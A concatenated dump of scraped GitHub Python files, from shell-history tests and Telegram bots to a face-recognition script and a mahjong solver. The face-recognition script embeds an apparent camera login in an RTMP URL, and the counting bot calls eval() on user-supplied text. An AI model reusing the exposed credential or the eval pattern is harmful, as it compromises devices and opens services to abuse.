HISTFILE=~/.zsh_history')\n proc.sendline(u'echo > $HISTFILE')\n proc.sendline(u'export SAVEHIST=100')\n proc.sendline(u'export HISTSIZE=100')\n proc.sendline(u'setopt INC_APPEND_HISTORY')\n return proc\n\n\n@pytest.mark.functional\ndef test_with_confirmation(proc, TIMEOUT):\n with_confirmation(proc, TIMEOUT)\n history_changed(proc, TIMEOUT, u'echo test')\n\n\n@pytest.mark.functional\ndef test_select_command_with_arrows(proc, TIMEOUT):\n select_command_with_arrows(proc, TIMEOUT)\n history_changed(proc, TIMEOUT, u'git help')\n\n\n@pytest.mark.functional\ndef test_refuse_with_confirmation(proc, TIMEOUT):\n refuse_with_confirmation(proc, TIMEOUT)\n history_not_changed(proc, TIMEOUT)\n\n\n@pytest.mark.functional\ndef test_without_confirmation(proc, TIMEOUT):\n without_confirmation(proc, TIMEOUT)\n history_changed(proc, TIMEOUT, u'echo test')\n\n\n@pytest.mark.functional\ndef test_how_to_configure_alias(proc, TIMEOUT):\n how_to_configure(proc, TIMEOUT)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/nvbn_thefuck/thefuck-master/tests/functional/test_zsh.py","file_name":"test_zsh.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"28428138375","text":"import asyncio\nimport logging\n\nimport aiorun\n\nfrom .core import Protector, setup_log\n\naiorun.logger.disabled = True\nlog = logging.getLogger(\"Main\")\nprotector = Protector()\n\nLOGGER = logging.getLogger(\"__name__\").setLevel(logging.WARNING)\n\ndef start():\n \"\"\"Main entry point\"\"\"\n setup_log()\n log.info(\"Loading code...\")\n\n try:\n import uvloop # pylint: disable=C0415\n except ImportError:\n log.warning(\"uvloop not installed! Skipping...\")\n print(\n \"\\nuvloop not installed! 
\"\n \"bot will work the same, but in a bit slower speed.\\n\"\n 'You may install it by \"poetry install -E uvloop\" or \"pip install uvloop\"\\n'\n )\n else:\n uvloop.install()\n\n loop = asyncio.new_event_loop()\n aiorun.run(protector.begin(loop=loop), loop=loop)\n","repo_name":"iamarch/Protector","sub_path":"Protector/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4467051972","text":"from time import sleep\n\n\ndef linha():\n print('-=' * 30)\n\n\ndef maior(*n):\n m = n[0]\n for i in n:\n if i > m:\n m = i\n linha()\n print('Analisando os valores passados', end='')\n for i in range(0, 3):\n sleep(1)\n print('.', end='')\n print(f'\\nOs números inseridos na chamada foram ', end='')\n for j in n:\n print(j, end=' ')\n sleep(.75)\n print(f'e o maior número é {m}')\n\nmaior(2, 9, 4, 5, 7, 1)\nmaior(3,6,4)\nmaior(4,9)\nmaior(0)","repo_name":"themegazord/CursoEmVideo---Python","sub_path":"CursoEmVideo/Exercicios/desafio99.py","file_name":"desafio99.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26990284780","text":"import re\r\nn = int(input())\r\nfor i in range(n):\r\n s = input()\r\n spl = s.split()\r\n \r\n pattern = r\"#[a-fA-F0-9]{3,6}\"\r\n \r\n if len(spl)>1 and \"{\" not in spl :\r\n spl = re.findall(pattern, s)\r\n for i in spl:\r\n print(i)","repo_name":"durgeshbhargava/INNOMATICS_DataScience_Internship","sub_path":"Task - 5 (RegEx)/5.10 Hex Color Code.py","file_name":"5.10 Hex Color Code.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21508107902","text":"from .exceptions import (\n BreakGraphError,\n InnerError,\n NotImplementException,\n inner_error_default_handler,\n)\nfrom .paddle_api_config import (\n is_break_graph_tensor_methods,\n paddle_tensor_methods,\n)\nfrom .utils import (\n ASSERT,\n Cache,\n NameGenerator,\n ResumeFnNameFactory,\n Singleton,\n count_if,\n execute_time,\n get_unbound_method,\n in_paddle_module,\n is_break_graph_api,\n is_builtin_fn,\n is_paddle_api,\n is_strict_mode,\n list_contain_by_id,\n list_find_index_by_id,\n log,\n log_do,\n map_if,\n meta_str,\n no_eval_frame,\n show_trackers,\n)\n\n__all__ = [\n \"InnerError\",\n \"NotImplementException\",\n \"BreakGraphError\",\n \"Singleton\",\n \"NameGenerator\",\n 'inner_error_default_handler',\n \"log\",\n \"log_do\",\n \"no_eval_frame\",\n \"is_builtin_fn\",\n \"is_paddle_api\",\n \"in_paddle_module\",\n \"is_break_graph_api\",\n 'is_break_graph_tensor_methods',\n \"map_if\",\n \"count_if\",\n \"Cache\",\n \"execute_time\",\n \"meta_str\",\n \"is_strict_mode\",\n \"paddle_tensor_methods\",\n \"ASSERT\",\n \"ResumeFnNameFactory\",\n \"list_contain_by_id\",\n \"list_find_index_by_id\",\n \"show_trackers\",\n \"get_unbound_method\",\n]\n","repo_name":"AILab-812/PaddleSOT","sub_path":"sot/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"71077316534","text":"import torch\nfrom torch import nn\n\nclass VSCNN(nn.Module):\n def __init__(self, bands, nc):\n # image_patch: 13x13\n super().__init__()\n self.feature = nn.Sequential(\n nn.Conv3d(1, 20, (3,3,3)),\n nn.ReLU(inplace=True),\n nn.MaxPool3d((1,2,2)),\n 
nn.Dropout3d(0.05),\n            nn.Conv3d(20, 40, (3,3,3)),\n            nn.ReLU(inplace=True),\n            nn.MaxPool3d((1,2,2))\n        )\n        self.classifier = nn.Sequential(\n            nn.Dropout(0.05),\n            nn.Linear((bands-4)*40, 80),\n            nn.ReLU(inplace=True),\n            nn.Linear(80, nc)\n        )\n\n    def forward(self, input):\n        '''\n        :param input: [batchsz, 1, depth, h, w]\n        :return: out: [batchsz, nc]\n        '''\n        f = self.feature(input)\n        batchsz = f.shape[0]\n        f = f.view((batchsz, -1))\n        out = self.classifier(f)\n        return out","repo_name":"dohoseok/HSICrop","sub_path":"model/VSCNN.py","file_name":"VSCNN.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35940743382","text":"# Quick sort\n\n# Pick one number as the pivot: values greater than the pivot go to the right, the rest to the left\ndef quick_sort(lists, left, right):\n    # quick sort\n    if left >= right:\n        return lists\n    key = lists[left]\n    low = left\n    high = right\n    while left < right:\n        while left < right and lists[right] >= key:\n            right -= 1\n        lists[left] = lists[right]\n        while left < right and lists[left] <= key:\n            left += 1\n        lists[right] = lists[left]\n    lists[right] = key\n    quick_sort(lists, low, left - 1)\n    quick_sort(lists, left + 1, high)\n    return lists\n\n\nif __name__ == '__main__':\n    arr = [56, 18, 6, 3, 97, 66, 57, 26, 88, 30, 99,93]\n    arr = quick_sort(arr, 0, len(arr) - 1)\n    print(arr)\n","repo_name":"CodeTornado/python_demo","sub_path":"work/Sort/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40784650686","text":"import queue\nimport threading\n\ndef my_function(argument, result_queue):\n    # Your function code here\n    result = argument + 1\n    result_queue.put(result)\n\n# Create a queue to store the results\nresult_queue = queue.Queue()\n\n# Create threads and pass the queue as an argument\nthread1 = threading.Thread(target=my_function, args=(1, result_queue))\nthread2 = threading.Thread(target=my_function, args=(2, result_queue))\n\n# Start threads\nthread1.start()\nthread2.start()\n\n# Get thread return values from the queue\nthread1_result = result_queue.get()\nthread2_result = result_queue.get()\n\n# Print thread return values\nprint(\"thread1_result:\", thread1_result)\nprint(\"thread2_result:\", thread2_result)","repo_name":"TWRSYB/JavBua_PaChon","sub_path":"01Test/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2128957851","text":"import os\nfrom misc.new_directory import new_directory\nfrom shutil import copyfile\n\n\ndef build_shiny(global_variables, shiny_info):\n\n    build_server(global_variables, shiny_info)\n    copy_shiny_files(global_variables)\n    get_rdata(global_variables)\n\n\n# builds the server\ndef build_server(global_variables, shiny_info):\n\n    SL_path = global_variables[\"SL_path\"]\n    out_path = global_variables[\"out_path\"]\n\n    # builds the server\n    new_directory(os.path.join(out_path, \"shiny\"))\n    server_in_file = open(os.path.join(SL_path, \"shiny\", \"app\", \"server_end.r\")).readlines()\n    server_out_file = open(os.path.join(out_path, \"shiny\", \"server.r\"), \"w\")\n\n    server_out_file.write(\"###--- SERVER ---####\\n\")\n    server_out_file.write(\"options(shiny.maxRequestSize=30*1024^2)\\n\")\n    server_out_file.write(\"server <- function(input, output, session)\\n\")\n    server_out_file.write(\"{\\n\\n\")\n    server_out_file.write(shiny_info)\n\n    for line in 
server_in_file:\n server_out_file.write(line)\n\n\n# copies files that don't need any modification\ndef copy_shiny_files(global_variables):\n\n SL_path = global_variables[\"SL_path\"]\n out_path = global_variables[\"out_path\"]\n\n # Adds the UI\n ui_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"ui.r\")\n ui_out_path = os.path.join(out_path, \"shiny\", \"ui.r\")\n copyfile(ui_in_path, ui_out_path)\n\n # Adds the server\n server_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"global.r\")\n server_out_path = os.path.join(out_path, \"shiny\", \"global.r\")\n copyfile(server_in_path, server_out_path)\n\n # Adds the www\n new_directory(os.path.join(out_path, \"shiny\", \"www\"))\n www_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"www\", \"sl2.gif\")\n www_out_path = os.path.join(out_path, \"shiny\", \"www\", \"sl2.gif\")\n copyfile(www_in_path, www_out_path)\n www_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"www\", \"sl2.png\")\n www_out_path = os.path.join(out_path, \"shiny\", \"www\", \"sl2.png\")\n copyfile(www_in_path, www_out_path)\n www_in_path = os.path.join(SL_path, \"shiny\", \"app\", \"www\", \"style.css\")\n www_out_path = os.path.join(out_path, \"shiny\", \"www\", \"style.css\")\n copyfile(www_in_path, www_out_path)\n\n\n#finds the workflow rdata dumps and copies them to the shiny folder\ndef copy_rdata(biotype, global_variables):\n\n out_path = global_variables[\"out_path\"]\n new_directory(os.path.join(out_path, \"shiny\", \"rdata\", biotype))\n\n if global_variables[\"ne_flag\"]:\n\n new_directory(os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"ne_workflow\"))\n rdata_in_path = os.path.join(out_path, biotype, \"ne_workflow\", \"plots\", \"workflow.rdata\")\n rdata_out_path = os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"ne_workflow\", \"workflow.rdata\")\n\n try:\n copyfile(rdata_in_path, rdata_out_path)\n except Exception as e:\n print(\"Warning: the ne workflow Rdata file is missing. It will be omitted from Shiny.\")\n\n\n if global_variables[\"de_workflows_flag\"]:\n\n parsed_de_parameters = global_variables[\"de_parameters\"]\n for de_parameter_dict in parsed_de_parameters:\n\n de_ID = de_parameter_dict[\"de_ID\"]\n de_ID_no_spaces = de_ID.replace(\" \", \"_\")\n new_directory(os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"de_workflows\", de_ID_no_spaces))\n rdata_in_path = os.path.join(out_path, biotype, \"de_workflows\", de_ID_no_spaces, \"plots\", \"workflow.rdata\")\n rdata_out_path = os.path.join(out_path, \"shiny\", \"rdata\", biotype, \"de_workflows\", de_ID_no_spaces, \"workflow.rdata\")\n\n try:\n copyfile(rdata_in_path, rdata_out_path)\n except Exception as e:\n print(\"Warning: the de workflow \" + de_ID + \" Rdata file is missing. It will be omitted from Shiny.\")\n\n if global_variables[\"mde_workflows_flag\"]:\n parsed_mde_parameters = global_variables[\"mde_parameters\"]\n for mde_dict in parsed_mde_parameters:\n \n mde_ID = mde_dict[\"mde_ID\"]\n new_directory(os.path.join(out_path, \"shiny\",\"rdata\", biotype, \"mde_workflows\", mde_ID))\n rdata_in_path = os.path.join(out_path, biotype, \"mde_workflows\", mde_ID, \"plots\", \"workflow.rdata\")\n rdata_out_path = os.path.join(out_path, \"shiny\",\"rdata\", biotype, \"mde_workflows\", mde_ID, \"workflow.rdata\")\n\n try:\n copyfile(rdata_in_path, rdata_out_path)\n except Exception as e:\n print(\"Warning: the Mde workflow \" + mde_ID + \" Rdata file is missing. 
It will be omitted from Shiny.\")\n\n\n# gets the rdata\ndef get_rdata(global_variables):\n\n    out_path = global_variables[\"out_path\"]\n\n    # does the work for \"all genes\"\n    new_directory(os.path.join(out_path, \"shiny\",\"rdata\"))\n    copy_rdata(\"all_genes\", global_variables)\n\n    #does the work for the biotypes\n    if global_variables[\"biotypes_flag\"] and len(global_variables[\"biotypes_dict\"].keys()) > 1:\n        biotypes_dict = global_variables[\"biotypes_dict\"]\n        biotypes = sorted(biotypes_dict.keys())\n        for biotype in biotypes:\n            copy_rdata(biotype, global_variables)\n\n\n\n\n\n","repo_name":"Searchlight2/Searchlight2","sub_path":"software/shiny/build_shiny.py","file_name":"build_shiny.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"15289137341","text":"import os\nimport sys\n\nsys.path.append(os.path.abspath(os.pardir))\n\nimport helper\n\ndef eval(pred_values, true_values, metric):\n    total_score = 0\n    for index in range(len(pred_values)):\n        total_score += metric(pred_values[index], true_values[index])\n    return total_score\n\nex1 = [[[0.2], [0.5]], [[-0.4], [-0.1]]]\nex2 = [[[0.9], [0.2]], [[0.8], [0.3]]]\nex3 = [[[0.2, 0.3]], [[-0.1, -0.2]]]\n\nall_examples = [('Example 1', ex1), ('Example 2', ex2), ('Example 3', ex3)]\nall_metrics = [helper.metric1, helper.metric2, helper.metric3]\n\nflatten = lambda values: [value for sublist in values for value in sublist]\n\nfor name, example in all_examples:\n    print(name)\n    for i, metric in enumerate(all_metrics):\n        pred_values = example[0]\n        true_values = example[1]\n        no_sentences = len(pred_values)\n        no_samples = len(flatten(pred_values))\n        if i == 0:\n            # Reference: http://stackoverflow.com/questions/952914/making-a-flat-list-out-of-list-of-lists-in-python\n            flatten = lambda values: [value for sublist in values for value in sublist]\n            pred_values = flatten(pred_values)\n            true_values = flatten(true_values)\n            metric_score = metric(pred_values, true_values)\n\n        elif i == 1:\n            metric_score = eval(pred_values, true_values, metric) / no_sentences\n        elif i == 2:\n            metric_score = eval(pred_values, true_values, metric) / no_samples\n\n        print('metric {}, value {}'.format(i+1, round(metric_score, 3)))\n","repo_name":"apmoore1/semeval","sub_path":"examples/metric_examples.py","file_name":"metric_examples.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"73191272371","text":"#!/usr/bin/env python3\nimport logging\n\nfrom telegram.ext import Updater, CommandHandler, Filters, Defaults, PicklePersistence\n\nfrom config import *\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\nstart = 'The count has been set to 0\\nRaise it with /count [number]'\nhelp = 'Raise the count with /count, /ct, or /c and a number'\neggs = {69:'\\nnice ;)', 420:'\\ngo green my dudes', 42: '\\nthe answer to the ultimate question of life, the universe, and everything', 100:'\\nnow we\\'re getting somewhere!', 1000:'\\nplease go do your work'}\nnum_list = '0123456789+-*/%^.()&|<>'\n\n\ndef send_start(update, context):\n    chat_id = update.message.chat_id\n    print('in start')\n\n    if 'count' not in context.chat_data:\n        context.chat_data['count'] = 0\n        context.chat_data['stats'] = {}\n\n    context.bot.send_message(chat_id=chat_id, text=start,\n                             
parse_mode='Markdown')\n\n\ndef send_help(update, context):\n chat_id = update.message.chat_id\n\n context.bot.send_message(chat_id=chat_id, text=help,\n parse_mode='Markdown')\n\n\ndef send_count(update, context):\n chat_id = update.message.chat_id\n sender = update.message.from_user['id']\n print('in count')\n\n if len(context.args) > 0:\n\n number = clean_number(''.join(context.args))\n print(number, sender)\n\n if number == '':\n message = 'That is not a number'\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n return\n\n number = int(eval(number))\n\n if 'count' in context.chat_data:\n if number == context.chat_data['count']+1 and ('sender' not in context.chat_data or context.chat_data['sender'] != sender):\n context.chat_data['count'] = number\n context.chat_data['sender'] = sender\n update_stats(update, context, number, True)\n if number % 10 == 0 or number in eggs:\n message = f\"The count is {number}\"\n if number in eggs:\n message = message + eggs[number]\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n else:\n context.chat_data['count'] = 0\n context.chat_data['sender'] = 0\n update_stats(update, context, number, False)\n message = 'The count is reset to 0'\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n else:\n if number == 1:\n context.chat_data['count'] = 1\n context.chat_data['stats'] = {}\n context.chat_data['sender'] = sender\n message = f\"The count is {number}\"\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n else:\n context.chat_data['count'] = 0\n context.chat_data['stats'] = {}\n message = 'The count has been set to 0'\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n\n\ndef send_stats(update, context):\n chat_id = update.message.chat_id\n print('in stats')\n\n highscore = max(list(int(context.chat_data['stats'][user_id]['highscore']) for user_id in context.chat_data['stats'].keys()))\n successes = sum(list(int(context.chat_data['stats'][user_id]['successes']) for user_id in context.chat_data['stats'].keys()))\n failures = sum(list(int(context.chat_data['stats'][user_id]['failures']) for user_id in context.chat_data['stats'].keys()))\n personal_stats = []\n for user_id in context.chat_data['stats']:\n user_name = context.chat_data[\"stats\"][user_id][\"username\"]\n user_score = context.chat_data[\"stats\"][user_id][\"highscore\"]\n user_success = context.chat_data[\"stats\"][user_id][\"successes\"]\n user_fail = context.chat_data[\"stats\"][user_id][\"failures\"]\n personal_stats.append(f'\\n\\n*@ {user_name}*\\nHigh score: {user_score}\\nSuccesses: {user_success}\\nFailures: {user_fail}')\n personal_stats = ''.join(personal_stats)\n\n message = f\"*Overall stats*\\nHigh score: {highscore}\\nTotal successes: {successes}\\nTotal failures: {failures}{personal_stats}\"\n context.bot.send_message(chat_id=chat_id, text=message,\n parse_mode='Markdown')\n\n\ndef clean_number(numstr):\n result = ''.join(filter(lambda x: x in num_list, numstr))\n result = result.lstrip('+*/%^.)')\n result = result.rstrip('+-*/%^.(')\n return result\n\n\ndef update_stats(update, context, number, success):\n user_id = str(update.message.from_user['id'])\n username = update.message.from_user['username']\n print('in update')\n\n if number != 1:\n if user_id not in context.chat_data['stats']:\n context.chat_data['stats'][user_id] = {'highscore': 0, 'successes': 0, 'failures': 0, 'username': username}\n\n if username != 
context.chat_data['stats'][user_id]['username']:\n context.chat_data['stats'][user_id]['username'] = username\n\n if success:\n if number > context.chat_data['stats'][user_id]['highscore']:\n context.chat_data['stats'][user_id]['highscore'] = number\n context.chat_data['stats'][user_id]['successes'] += 1\n else:\n context.chat_data['stats'][user_id]['failures'] += 1\n\n\ndef main():\n defaults = Defaults(disable_web_page_preview=True)\n pp = PicklePersistence(filename='chat_data_states', store_user_data=False,\n store_bot_data=False)\n\n updater = Updater(BOT_TOKEN, use_context=True, persistence=pp, defaults=defaults)\n\n dp = updater.dispatcher\n print('f')\n\n dp.add_handler(CommandHandler(\"start\", send_start))\n dp.add_handler(CommandHandler(\"help\", send_help))\n dp.add_handler(CommandHandler([\"count\", \"ct\", \"c\"], send_count))\n dp.add_handler(CommandHandler([\"stats\", \"getstats\"], send_stats))\n\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yrafalin/TelegramBots","sub_path":"CountingBot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36695573442","text":"name = input()\n\nevaluation = 0\ncurrent_grade = 0\nfails = 0\n\nwhile True:\n current_evaluation = float(input())\n\n if current_evaluation < 4:\n fails += 1\n if fails == 2:\n break\n continue\n\n if current_evaluation >= 4:\n current_grade += 1\n evaluation += current_evaluation\n\n if current_grade >= 12:\n break\n\naverage_evaluation = evaluation / 12\n\nif fails >= 2:\n print(f\"{name} has been excluded at {current_grade + 1} grade\")\nelse:\n print(f\"{name} graduated. Average grade: {average_evaluation:.2f}\")\n\n\n","repo_name":"BlackRock17/Programming-Basics-Python-2022","sub_path":"While_Loop/graduation.py","file_name":"graduation.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21742762072","text":"#!/usr/bin/env python3\n\nimport sys\n\n\nclass Combination:\n\n def __init__(self):\n self.pongs = []\n self.chows = []\n self.eye = None\n self.winning_tile = None\n\n def count_sets(self):\n return len(self.pongs) + len(self.chows)\n\n def set_eye(self, eye_index):\n self.eye = eye_index\n\n def set_winning_tile(self, tile_index):\n self.winning_tile = tile_index\n\n def is_all_pong(self):\n pass\n\n def __str__(self):\n buffer = ''\n if not self.winning_tile == None:\n buffer += f'[{self.winning_tile + 1}] '\n buffer += '['\n all_sets = self.chows + self.pongs\n all_sets.sort(key=lambda x: x[0])\n for chow in all_sets:\n for tile in chow:\n buffer += str(tile + 1)\n buffer += ' '\n buffer = buffer.strip()\n if not self.eye == None:\n buffer += ' ' + str(self.eye + 1) * 2\n buffer += ']'\n return buffer\n\n\ndef hand_str_to_freq(hand):\n \"\"\"'2234' -> (0, 2, 1, 1, 0, 0, 0, 0, 0)\"\"\"\n frequency_hand = [0] * 9\n for tile in hand:\n frequency_hand[int(tile) - 1] += 1\n return tuple(frequency_hand)\n\n\ndef hand_freq_to_str(hand):\n \"\"\"(0, 2, 1, 1, 0, 0, 0, 0, 0) -> '2234'\"\"\"\n buffer = ''\n for i in range(len(hand)):\n buffer += hand[i] * str(i + 1)\n return buffer\n\n\ndef find_pong(hand, i):\n if hand[i] >= 3:\n hand[i] -= 3\n return (i,) * 3\n return\n\n\ndef find_chows(hand, i):\n chows = []\n # If the next 2 consecutive tiles are beyond the size of the hand, skip\n if i + 2 >= len(hand):\n return chows\n sets = 
min(hand[i], hand[i + 1], hand[i + 2])\n for j in range(3):\n hand[i + j] -= sets\n for _ in range(sets):\n chows.append((i, i + 1, i + 2))\n return chows\n\n\ndef find_sets(hand):\n combination = Combination()\n hand = list(hand)\n for i in range(len(hand)):\n # Pongs\n pong = find_pong(hand, i)\n if pong:\n combination.pongs.append(pong)\n # Chows\n combination.chows.extend(find_chows(hand, i))\n return combination\n\n\ndef find_sets_chows_first(hand):\n combination = Combination()\n hand = list(hand)\n for i in range(len(hand)):\n # Chows\n combination.chows.extend(find_chows(hand, i))\n # Pongs\n pong = find_pong(hand, i)\n if pong:\n combination.pongs.append(pong)\n return combination\n\n\ndef find_hu(hand):\n win_combis = []\n size = sum(hand)\n if (size > 14 or size < 2) or (size - 1) % 3 == 0:\n print('Incomplete hand.')\n return win_combis\n\n # Detect if the eyes are already formed outside of this hand\n eyes_outside = size % 3 == 0\n\n # Calculate number of sets\n sets = size // 3\n\n if eyes_outside:\n combination = find_sets(hand)\n if combination.count_sets() == sets:\n win_combis.append(combination)\n if len(combination.pongs) >= 3:\n combination = find_sets_chows_first(hand)\n if not len(combination.pongs) >= 3:\n win_combis.append(combination)\n else:\n # If the eyes are inside, find and remove it\n for i in range(len(hand)):\n if hand[i] < 2:\n continue\n hand_eyeless = list(hand)\n hand_eyeless[i] -= 2\n hand_eyeless = tuple(hand_eyeless)\n combination = find_sets(hand_eyeless)\n if combination.count_sets() == sets:\n combination.set_eye(i) # add back the eyes\n win_combis.append(combination)\n if len(combination.pongs) >= 3:\n combination = find_sets_chows_first(hand_eyeless)\n if not len(combination.pongs) >= 3:\n combination.set_eye(i) # add back the eyes\n win_combis.append(combination)\n\n return win_combis\n\n\ndef find_waits(hand_str):\n waits = []\n hand_str = hand_str.strip()\n size = len(hand_str)\n if (size > 13 or size < 1) or size % 3 == 0:\n print('Hand is not waiting.')\n return waits\n\n try:\n hand = hand_str_to_freq(hand_str)\n except ValueError:\n print('Hand is invalid, contains characters.')\n return waits\n\n # Check if adding any tile (1-9) will make this hand win/hu\n for tile in range(9):\n\n # If there's more than 4 of the same tile, hand is invalid \n if hand[tile] > 4:\n print(f'Hand is invalid, more than four of tile {tile + 1}.')\n return waits\n\n # If there's already 4 of the same tiles, skip\n if hand[tile] == 4:\n continue\n\n # Make a copy and add 1 tile to test out\n test_hand = list(hand)\n test_hand[tile] += 1\n test_hand = tuple(test_hand)\n win_combis = find_hu(test_hand)\n for combi in win_combis:\n combi.set_winning_tile(tile)\n waits.extend(win_combis)\n\n return waits\n\n\ndef generate_output(waits):\n buffer = ''\n tiles = []\n for c in waits:\n buffer += str(c) + '\\n'\n if c.winning_tile + 1 not in tiles:\n tiles.append(c.winning_tile + 1)\n buffer += f'\\nYou\\'re waiting for: {tiles}'\n return buffer\n\n\ndef main():\n if len(sys.argv) < 2:\n print(f'Usage: {sys.argv[0]} 3334567')\n exit(1)\n hand = sys.argv[1]\n\n waits = find_waits(hand)\n print(generate_output(waits))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Optixal/Machi","sub_path":"machi.py","file_name":"machi.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20831110225","text":"import face_recognition\nimport cv2\nimport os\nimport 
string\nimport threading\nimport Queue\nimport time\n\n#Variables\ninputQueue = Queue.Queue()\noutputQueue = Queue.Queue()\nname = raw_input('Enter Name: ').lower()\ncamera = cv2.VideoCapture('rtmp://192.168.20.144:1935/flash/12:admin:EYE3inapp')\n\nknown_face_names = [\n    name\n]\n\n\n\n\nwhile True:\n\trval, frame = camera.read()\n\tcv2.imshow(\"Video\", frame)\n\tkey = cv2.waitKey(20)\n\tif key == 1048603: # exit on ESC\n\t\tbreak\n\tif key == 1048586: # Enter button to take picture \n\t\tfolder = 'images/'+name\n\t\tif not os.path.exists(folder):\n\t\t\toriginal_umask = os.umask(0)\n\t\t\tos.makedirs(folder)\n\t\n\t\tcv2.imwrite(folder + '/' + name + '.jpg',frame)\n\t\tbreak\n\ncv2.destroyWindow('Video')\n\n\nimage_name = face_recognition.load_image_file('images/'+ name + '/' + name + '.jpg')\nimage_face_encoding = face_recognition.face_encodings(image_name)[0]\nknown_face_encodings = [\n    image_face_encoding\n]\n\n\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\ndef get_video():\n\twhile True:\n\t\tret, frame = camera.read()\n\t\tinputQueue.put(frame)\n\t\t#print inputQueue.qsize()\n\t\t\n\n\n\ndef face_detect():\n\tprocess_this_frame = True\n\twhile True:\n\t\tif not inputQueue.empty():\n\t\t\tframe = inputQueue.get()\n\t\t\tsmall_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\t\t\trgb_small_frame = small_frame[:, :, ::-1]\n\t\t\tif process_this_frame:\n\t\t\t\tface_locations = face_recognition.face_locations(rgb_small_frame)\n\t\t\t\tface_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\t\t\t\tface_names = []\n\t\t\t\tfor face_encoding in face_encodings:\n\t\t\t\t\tmatches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\t\t\t\t\tname = \"Unknown\"\n\t\t\t\t\tif True in matches:\n\t\t\t\t\t\tfirst_match_index = matches.index(True)\n\t\t\t\t\t\tname = known_face_names[first_match_index]\n\t\t\t\t\tface_names.append(name)\n\t\t\tprocess_this_frame = not process_this_frame\n\t\t\tfor (top, right, bottom, left), name in zip(face_locations, face_names):\n\t\t\t\ttop *= 4\n\t\t\t\tright *= 4\n\t\t\t\tbottom *= 4\n\t\t\t\tleft *= 4\n\t\t\t\tcv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\t\t\t\tcv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), -1)\n\t\t\t\tfont = cv2.FONT_HERSHEY_DUPLEX\n\t\t\t\tcv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\t\t\t\toutputQueue.put(frame)\n\t\t\nvideo_capture = threading.Thread(target = get_video, args = ())\nrun_face_detection = []\nfor i in range(0,1):\n\tt = threading.Thread(target = face_detect , args = ())\n\trun_face_detection.append(t)\n\nvideo_capture.daemon = True\nfor i in range(0,1):\n\trun_face_detection[i].daemon = True\n\t\nfor i in range(0,1):\n\trun_face_detection[i].start()\n\n\nvideo_capture.start()\n\nwhile True:\n\tif not outputQueue.empty():\n\t\tframe = outputQueue.get()\n\t\tcv2.imshow('Output', frame)\n\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\tbreak\n\n\n\ncamera.release()\ncv2.destroyAllWindows()\n\n\n\n\n","repo_name":"arvindspanicker/Face-Recognition","sub_path":"detect_faces.py","file_name":"detect_faces.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1634247942","text":"for epoch in range(training_epochs):\n    sess.run(training_step, feed_dict={x:train_x, y_:train_y})\n    cost = sess.run(cost_function, feed_dict={x: train_x, y_: 
